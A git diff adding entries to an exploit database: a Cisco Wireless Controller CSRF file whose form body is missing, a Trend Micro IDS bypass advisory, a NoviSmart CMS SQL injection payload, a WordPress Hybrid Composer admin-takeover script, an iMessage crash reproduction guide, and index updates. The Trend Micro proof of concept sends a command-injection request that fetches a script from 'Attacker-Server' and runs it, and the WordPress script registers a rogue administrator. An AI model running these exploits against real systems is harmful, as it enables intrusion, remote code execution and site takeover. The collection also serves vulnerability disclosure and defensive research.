diff --git a/exploits/hardware/webapps/47153.html b/exploits/hardware/webapps/47153.html new file mode 100644 index 000000000..567580d52 --- /dev/null +++ b/exploits/hardware/webapps/47153.html @@ -0,0 +1,34 @@ +# Product : Cisco Wireless Controller +# Version : 3.6.10E (last version) +# Date: 23.07.2019 +# Vendor Homepage: https://www.cisco.com +# Exploit Author: Mehmet Önder Key +# Website: htts://cloudvist.com +# Description : The application interface allows users to perform certain +actions via HTTP requests without performing any validity checks to verify +the requests. This can be exploited to perform certain actions with +administrative privileges if a logged-in user visits a malicious web site. +# Tested On : Win10 & KaliLinux + +Add Admin CSRF Payload @Cisco Wireless Controller +--------------- + + +
+ + + + + + + + + + + + + +
+ + \ No newline at end of file diff --git a/exploits/multiple/remote/47155.txt b/exploits/multiple/remote/47155.txt new file mode 100644 index 000000000..60a476b6c --- /dev/null +++ b/exploits/multiple/remote/47155.txt @@ -0,0 +1,104 @@ +[+] Credits: John Page (aka hyp3rlinx) +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/TREND-MICRO-DEEP-DISCOVERY-INSPECTOR-PERCENT-ENCODING-IDS-BYPASS.txt +[+] ISR: Apparition Security + + +[Vendor] +www.trendmicro.com + + +[Product] +Deep Discovery Inspector + +Deep Discovery Inspector is a network appliance that monitors all ports and over 105 different network protocols to discover advanced threats and targeted attacks +moving in and out of the network and laterally across it. The appliance detects and analyzes malware, command-and-control (C&C) communications, and evasive attacker +activities that are invisible to standard security defenses. + + + +[Vulnerability Type] +Percent Encoding IDS Bypass + + +[CVE Reference] +Vendor decided not to release a CVE + + +[Security Issue] +Trend Micro Deep Discovery Inspector IDS will typically trigger alerts for malicious system commands like "Wget Commandline Injection" and they will be flagged as high. +Attacker payloads sent with normal ascii characters for example like "wget" or even if they have been HEX encoded like "\x77\x67\x65\x74" they will still get flagged and alerted on. + +However, attackers can easily bypass these alerts by sending malicious commands in HEX preceded by percent sign chars "%", e.g. "%77%67%65%74" which also translates to "wget" and +will not get flagged or alerted on and may still be processed on the target system. + +e.g. + +DDI RULE 2452 +https://www.trendmicro.com/vinfo/us/threat-encyclopedia/network/ddi-rule-2452 + +Therefore, Trend Micro IDS alerts can be easily bypassed and the payload is still run by the vulnerable target if the payload is encoded using percent/hex encoding like %77%67%65%74. +That will not only bypass the IDE by having no alert triggered or notification sent but the application will still process the malicious command. + +Importantly, the "wget" DDI Rule 2452 used is just an example and can potentially be any malicious request where the IDS checks the character encodings but fails to account for +percent encoded HEX character payload values. + + +[Exploit/POC] +from socket import * +#Bypass TM DDI IDS e.g. Rule 2452 (Wget command line injection) PoC +#Discovery: hyp3rlinx - ApparitionSec +#Apparition Security +#Firewall Rule Bypass + +IP = raw_input("[+] Trend Micro IDS") +PORT = 80 + +payload="/index.php?s=/index/vulnerable/app/invoke&function=call_user_func_array&vars[0]=system&vars[1][]=%77%67%65%74%20http://Attacker-Server/x.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a" +req = "GET "+payload+" HTTP/1.1\r\nHost"+IP+"\r\nConnection: close\r\n\r\n" + +s=socket(AF_INET, SOCK_STREAM) +s.connect((IP, PORT)) +s.send(req) +res="" + +while True: + res = s.recv(512) + print res + if res=="\n" or "": + break + +s.close() + + +#Result is 200 HTTP OK and code execution on vuln app and No IDS Alert gets triggered. + + + +[Network Access] +Remote + + + +[Severity] +High + + + +[Disclosure Timeline] +Vendor Notification: May 14, 2019 +Vendor confirmed the IDS Bypass: May 20, 2019 +Vendor informed that a DDI IDS enhancement has been made: July 18, 2019 +July 23, 2019 : Public Disclosure + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). + +hyp3rlinx \ No newline at end of file diff --git a/exploits/php/webapps/47152.txt b/exploits/php/webapps/47152.txt new file mode 100644 index 000000000..746561929 --- /dev/null +++ b/exploits/php/webapps/47152.txt @@ -0,0 +1,26 @@ +# Exploit Title: NoviSmart CMS SQL injection +# Date: 23.7.2019. +# Exploit Author: n1x_ [MS-WEB] +# Vendor Homepage: http://www.novismart.com/ +# Version: Every version +# CVE : CWE-89 + +Vulnerable parameter: Referer (HTTP Header field) + +[GET Request] + +GET / HTTP/1.1 +Referer: if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 +Client-IP: 127.0.0.1 +X-Forwarded-For: 127.0.0.1 +X-Forwarded-Host: localhost +Accept-Language: en +Via: 1.1 wa.www.test.com +Origin: http://www.test.com/ +X-Requested-With: XMLHttpRequest +Cookie: PHPSESSID=24769012200df6ccd9002dbf5b978e9c; language=1 +Host: host +Connection: Keep-alive +Accept-Encoding: gzip,deflate +Accept: */* \ No newline at end of file diff --git a/exploits/php/webapps/47154.py b/exploits/php/webapps/47154.py new file mode 100755 index 000000000..83949d9ce --- /dev/null +++ b/exploits/php/webapps/47154.py @@ -0,0 +1,62 @@ +# Exploit Title: Wordpress Hybrid Composer <= 1.4.6 - Unauthenticated Configuration Access (Admin Takeover) +# Date: 2019-07-24 +# Vendor Homepage: http://wordpress.framework-y.com +# Software Link: http://wordpress.framework-y.com/hybrid-composer/ +# Reference: https://labs.sucuri.net/wptf-hybrid-composer-unauthenticated-arbitrary-options-update/, https://wpvulndb.com/vulnerabilities/9452 +# Affected version: <= 1.4.6 +# Researcher: rootetsy +# Exploit Author: yasin +# Tested on: Linux +# Vulnerability discovered by rootetsy + + +# Summary +The plugin Hybrid Composer allows unauthenticated users to update any option in the options database table. + +# Description +A Hybrid Composer plugin enables API routes by registering actions with either wp_ajax_ for authenticated or wp_ajax_nopriv_ for unauthenticated calls. Plugins using wp_ajax_nopriv_ actions should be fine as long as they are not giving access to methods with critical functionalities. +index.php in the WPTF Hybrid Composer plugin prior 1.4.7 for WordPress has an Unauthenticated Settings Change Vulnerability, related to certain wp_ajax_nopriv_ usage. Anyone can change the plugin's setting by simply sending a request with a hc_ajax_save_option action. + + +# Usage: python exploit.py + + + +########################################################### +import httplib, urllib +import sys +import random +# pip install httplib urllib random + +site = raw_input("[+] Target: ") +url = "/wp-admin/admin-ajax.php" +username = "user-%d" % random.randrange(1000000, 3000000) +email = raw_input("[+] E-mail: ") + +def ChangeOption(site, url, option_name, content): + params = urllib.urlencode({'action': 'hc_ajax_save_option', 'option_name': option_name, 'content': content}) + headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"} + conn = httplib.HTTPSConnection(site) # conn = httplib.HTTPConnection(site) + conn.request("POST", url, params, headers) + response = conn.getresponse() + data = response.read() + conn.close() +registration_url= "/wp-login.php" +def AdminTakeover(site, registration_url, user_login, user_email): + params = urllib.urlencode({'action': 'register', 'user_login': user_login, 'user_email': user_email}) + headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"} + conn = httplib.HTTPSConnection(site) # conn = httplib.HTTPConnection(site) + conn.request("POST", registration_url, params, headers) + response = conn.getresponse() + data = response.read() + conn.close() +ChangeOption(site, url, "users_can_register", "1") +ChangeOption(site, url, "default_role", "administrator") +print "[+] Registering new admin user" +AdminTakeover(site, registration_url, username, email) +print "[+] Check your email for password: " + username + "[" + email + "]" +ChangeOption(site, url, "users_can_register", "0") +ChangeOption(site, url, "default_role", "subscriber") + + +########################################################### \ No newline at end of file diff --git a/exploits/watchos/dos/47158.txt b/exploits/watchos/dos/47158.txt new file mode 100644 index 000000000..f6c1bba6e --- /dev/null +++ b/exploits/watchos/dos/47158.txt @@ -0,0 +1,18 @@ +The digital touch iMessage extension can read out of bounds if a malformed Tap message contains a color array that is shorter than the points array and delta array. The method [ETTapMessage initWithArchiveData:] checks that the points array is twice as long as the deltas array, but only checks that the colors array is longer than eight bytes, even though a color is needed for every point-delta pair that is processed. + +To reproduce the issue with the files in tapcrash.zip: + +1) install frida (pip3 install frida) +2) open sendMessage.py, and replace the sample receiver with the phone number or email of the target device +3) in injectMessage.js replace the marker "FULL PATH" with the path of the obj file +4) in the local directory, run: + +python3 sendMessage.py + +This will lead to a crash in SpringBoard requiring no user interaction. + +I've also attached a crash dump and ETencode.m, which is the file that was used to generate the obj file. + + +Proof of Concept: +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47158.zip \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index e8ae2a17f..8ec6b6782 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6512,6 +6512,7 @@ id,file,description,date,author,type,platform,port 47127,exploits/windows/dos/47127.txt,"Microsoft Compiled HTML Help / Uncompiled .chm File - XML External Entity Injection",2019-07-16,hyp3rlinx,dos,windows, 47131,exploits/windows/dos/47131.py,"WinMPG iPod Convert 3.0 - 'Register' Denial of Service",2019-07-17,stresser,dos,windows, 47148,exploits/linux/dos/47148.py,"BACnet Stack 0.8.6 - Denial of Service",2019-07-22,mmorillo,dos,linux, +47158,exploits/watchos/dos/47158.txt,"Apple iMessage - DigitalTouch tap Message Processing Out-of-Bounds Read",2019-07-24,"Google Security Research",dos,watchos, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -17564,6 +17565,7 @@ id,file,description,date,author,type,platform,port 47129,exploits/linux/remote/47129.rb,"PHP Laravel Framework 5.5.40 / 5.6.x < 5.6.30 - token Unserialize Remote Command Execution (Metasploit)",2019-07-16,Metasploit,remote,linux, 47130,exploits/windows/remote/47130.txt,"MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow",2019-07-17,hyp3rlinx,remote,windows, 47137,exploits/windows_x86/remote/47137.py,"MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow (EggHunter)",2019-07-19,sasaga92,remote,windows_x86, +47155,exploits/multiple/remote/47155.txt,"Trend Micro Deep Discovery Inspector IDS - Security Bypass",2019-07-24,hyp3rlinx,remote,multiple, 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -41528,3 +41530,6 @@ id,file,description,date,author,type,platform,port 47145,exploits/linux/webapps/47145.txt,"Web Ofisi Firma 13 - 'oz' SQL Injection",2019-07-19,"Ahmet Ümit BAYRAM",webapps,linux, 47146,exploits/php/webapps/47146.txt,"REDCap < 9.1.2 - Cross-Site Scripting",2019-07-19,"Alexandre ZANNI",webapps,php, 47150,exploits/linux/webapps/47150.txt,"Axway SecureTransport 5 - Unauthenticated XML Injection",2019-07-22,"Dominik Penner",webapps,linux, +47152,exploits/php/webapps/47152.txt,"NoviSmart CMS - SQL injection",2019-07-24,n1x_,webapps,php, +47153,exploits/hardware/webapps/47153.html,"Cisco Wireless Controller 3.6.10E - Cross-Site Request Forgery",2019-07-24,"Mehmet Onder",webapps,hardware, +47154,exploits/php/webapps/47154.py,"WordPress Plugin Hybrid Composer 1.4.6 - Improper Access Restrictions",2019-07-24,yasin,webapps,php,